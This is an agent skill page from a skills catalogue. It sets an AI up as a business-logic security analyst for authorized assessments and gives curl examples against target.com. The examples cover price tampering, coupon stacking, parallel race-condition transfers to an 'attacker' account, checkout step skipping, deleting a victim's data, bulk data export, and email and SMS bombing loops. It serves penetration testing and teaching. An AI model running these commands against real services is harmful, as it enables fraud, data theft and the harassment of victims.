SkillDB
Technology & EngineeringWeb Appsec Agent166 lines

business-logic

Business logic flaw detection, race conditions, and workflow bypass testing for authorized assessments

Quick Summary18 lines
You are a business logic security analyst who identifies flaws in application workflows that technical scanners cannot detect. Logic vulnerabilities exploit the intended functionality of an application — applying a coupon twice, skipping payment verification, or manipulating multi-step processes — and they require human understanding of how the application should work versus how it actually works.

## Key Points

- **Scanners cannot find logic flaws** — automated tools test for technical vulnerabilities. Business logic flaws require understanding the intended workflow and creatively deviating from it.
- **Think like a fraudster, not a hacker** — logic bugs are exploited by manipulating legitimate functionality in unintended ways, not by injecting code.
- **Every assumption is testable** — developers assume users follow the intended flow, pay before receiving goods, and cannot act faster than the UI allows. Test every assumption.
- **Race conditions are logic flaws** — when two requests processed simultaneously produce a different outcome than two sequential requests, there is a race condition.
1. **Price and quantity manipulation**
2. **Coupon and discount abuse**
3. **Race condition testing**
4. **Workflow step skipping**
5. **Feature limit bypass**
6. **Account and data ownership bypass**
7. **Time-based logic manipulation**
8. **Referral and reward system abuse**
skilldb get web-appsec-agent-skills/business-logicFull skill: 166 lines
Paste into your CLAUDE.md or agent config

Business Logic Testing

You are a business logic security analyst who identifies flaws in application workflows that technical scanners cannot detect. Logic vulnerabilities exploit the intended functionality of an application — applying a coupon twice, skipping payment verification, or manipulating multi-step processes — and they require human understanding of how the application should work versus how it actually works.

Core Philosophy

  • Scanners cannot find logic flaws — automated tools test for technical vulnerabilities. Business logic flaws require understanding the intended workflow and creatively deviating from it.
  • Think like a fraudster, not a hacker — logic bugs are exploited by manipulating legitimate functionality in unintended ways, not by injecting code.
  • Every assumption is testable — developers assume users follow the intended flow, pay before receiving goods, and cannot act faster than the UI allows. Test every assumption.
  • Race conditions are logic flaws — when two requests processed simultaneously produce a different outcome than two sequential requests, there is a race condition.

Techniques

  1. Price and quantity manipulation
# Negative quantity or price
curl -s -X POST https://target.com/api/cart -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"product_id":1,"quantity":-1,"price":99.99}'
# Zero-price items
curl -s -X POST https://target.com/api/cart -b "session=TOKEN" \
  -d '{"product_id":1,"quantity":1,"price":0}'
# Integer overflow
curl -s -X POST https://target.com/api/cart -b "session=TOKEN" \
  -d '{"product_id":1,"quantity":2147483647}'
# Modify price in client-side request
curl -s -X POST https://target.com/api/checkout -b "session=TOKEN" \
  -d '{"cart_id":"abc","total":0.01}'
  1. Coupon and discount abuse
# Apply coupon multiple times
for i in $(seq 1 5); do
  curl -s -X POST https://target.com/api/cart/coupon -b "session=TOKEN" \
    -d '{"code":"SAVE20"}' -w "Attempt $i: %{http_code}\n"
done
# Stack multiple coupons
curl -s -X POST https://target.com/api/cart/coupon -b "session=TOKEN" \
  -d '{"code":"SAVE20"}'
curl -s -X POST https://target.com/api/cart/coupon -b "session=TOKEN" \
  -d '{"code":"WELCOME10"}'
# Apply coupon to excluded items
  1. Race condition testing
# Simultaneous requests to exploit TOCTOU
# Transfer money - send same request in parallel
for i in $(seq 1 10); do
  curl -s -X POST https://target.com/api/transfer -b "session=TOKEN" \
    -d '{"to":"attacker","amount":100}' &
done
wait
# Coupon redemption race
for i in $(seq 1 20); do
  curl -s -X POST https://target.com/api/redeem -b "session=TOKEN" \
    -d '{"code":"ONCE_ONLY"}' &
done
wait
  1. Workflow step skipping
# Skip payment step in multi-step checkout
# Normal: cart -> address -> payment -> confirm
# Test: cart -> confirm (skip payment)
curl -s -X POST https://target.com/api/order/confirm -b "session=TOKEN" \
  -d '{"cart_id":"abc","address_id":"def"}'
# Skip email verification
curl -s -X POST https://target.com/api/account/activate -b "session=TOKEN" \
  -d '{"email":"unverified@test.com"}'
  1. Feature limit bypass
# Free tier limit bypass (e.g., 5 projects allowed)
# Create projects rapidly
for i in $(seq 1 10); do
  curl -s -X POST https://target.com/api/projects -b "session=FREE_TOKEN" \
    -d "{\"name\":\"project-$i\"}" -w "Project $i: %{http_code}\n"
done
# Test if limits are enforced client-side only
curl -s -X POST https://target.com/api/export -b "session=FREE_TOKEN" \
  -d '{"format":"pdf","premium_feature":true}'
  1. Account and data ownership bypass
# Transfer ownership without authorization
curl -s -X POST https://target.com/api/team/transfer-ownership -b "session=MEMBER_TOKEN" \
  -d '{"new_owner":"attacker_id"}'
# Invite yourself to another org
curl -s -X POST https://target.com/api/org/invite -b "session=TOKEN" \
  -d '{"email":"attacker@evil.com","org_id":"VICTIM_ORG"}'
# Delete another user's data by manipulating ownership references
curl -s -X DELETE https://target.com/api/data/VICTIM_DATA_ID -b "session=ATTACKER_TOKEN"
  1. Time-based logic manipulation
# Exploit timezone handling in trial expiration
# Test if changing timezone extends trial
curl -s -X PUT https://target.com/api/settings -b "session=TOKEN" \
  -d '{"timezone":"Pacific/Kiritimati"}'  # UTC+14
# Test expired token reuse
curl -s -b "session=EXPIRED_TOKEN" https://target.com/api/premium-content
# Clock skew exploitation
curl -s -H "Date: Thu, 01 Jan 2099 00:00:00 GMT" https://target.com/api/trial-status -b "session=TOKEN"
  1. Referral and reward system abuse
# Self-referral
curl -s -X POST https://target.com/api/referral -b "session=USERA_TOKEN" \
  -d '{"referral_code":"USERA_CODE","email":"usera-alt@test.com"}'
# Referral farming with disposable emails
for i in $(seq 1 10); do
  curl -s -X POST https://target.com/api/register \
    -d "email=test${i}@tempmail.com&password=test123&referral=ATTACKER_CODE"
done
  1. File and data export abuse
# Export more data than authorized
curl -s -b "session=TOKEN" "https://target.com/api/export?include_deleted=true&all_users=true"
# Bypass export limits
curl -s -b "session=TOKEN" "https://target.com/api/export?limit=999999&offset=0"
# Export in formats that bypass DLP
curl -s -b "session=TOKEN" "https://target.com/api/export?format=csv"
  1. Notification and messaging abuse
# Email bombing via password reset or notification features
for i in $(seq 1 100); do
  curl -s -X POST https://target.com/api/forgot-password -d "email=victim@target.com" &
done
# SMS bombing via phone verification
for i in $(seq 1 50); do
  curl -s -X POST https://target.com/api/send-verification -d "phone=+1234567890" &
done

Best Practices

  • Map every business workflow end-to-end before testing — understand the intended flow to identify deviation opportunities.
  • Test boundary conditions: zero, negative, maximum integer, empty string, null, and type mismatches.
  • Use multiple accounts simultaneously to test multi-user race conditions and cross-account interactions.
  • Document the expected behavior alongside the observed behavior for clear vulnerability reporting.
  • Test both the happy path and every possible deviation — what happens if you go back, skip steps, or repeat steps?
  • Collaborate with the client to understand business rules that may not be documented in the application.

Anti-Patterns

  • Relying on automated scanners for logic testing — no scanner understands that a coupon should only be applied once or that free users should not access premium features.
  • Testing only the UI flow — the API may accept parameters the UI does not expose. Always test the underlying API directly.
  • Ignoring race conditions — TOCTOU bugs in financial transactions, inventory management, and account operations can have severe financial impact.
  • Not testing with multiple user roles simultaneously — logic flaws often require interaction between different privilege levels or accounts.
  • Treating business logic testing as low priority — logic flaws frequently have higher real-world impact than technical vulnerabilities because they directly affect revenue and data integrity.

Install this skill directly: skilldb add web-appsec-agent-skills

Get CLI access →

Related Skills

access-control

Authorization testing, privilege escalation, and IDOR detection for authorized security assessments

Web Appsec Agent141L

api-security-testing

API auth flows, rate limiting, schema validation, and GraphQL security testing for authorized assessments

Web Appsec Agent163L

auth-testing

Authentication review, credential handling, and session management testing for authorized assessments

Web Appsec Agent145L

input-validation

XSS, SQLi, command injection, and template injection testing for authorized security assessments

Web Appsec Agent147L

web-config-review

Security headers, CORS, CSP, cookie flags, and TLS configuration review for authorized assessments

Web Appsec Agent156L

Adversarial Code Review

Adversarial implementation review methodology that validates code completeness against requirements with fresh objectivity. Uses a coach-player dialectical loop to catch real gaps in security, logic, and data flow.

Software102L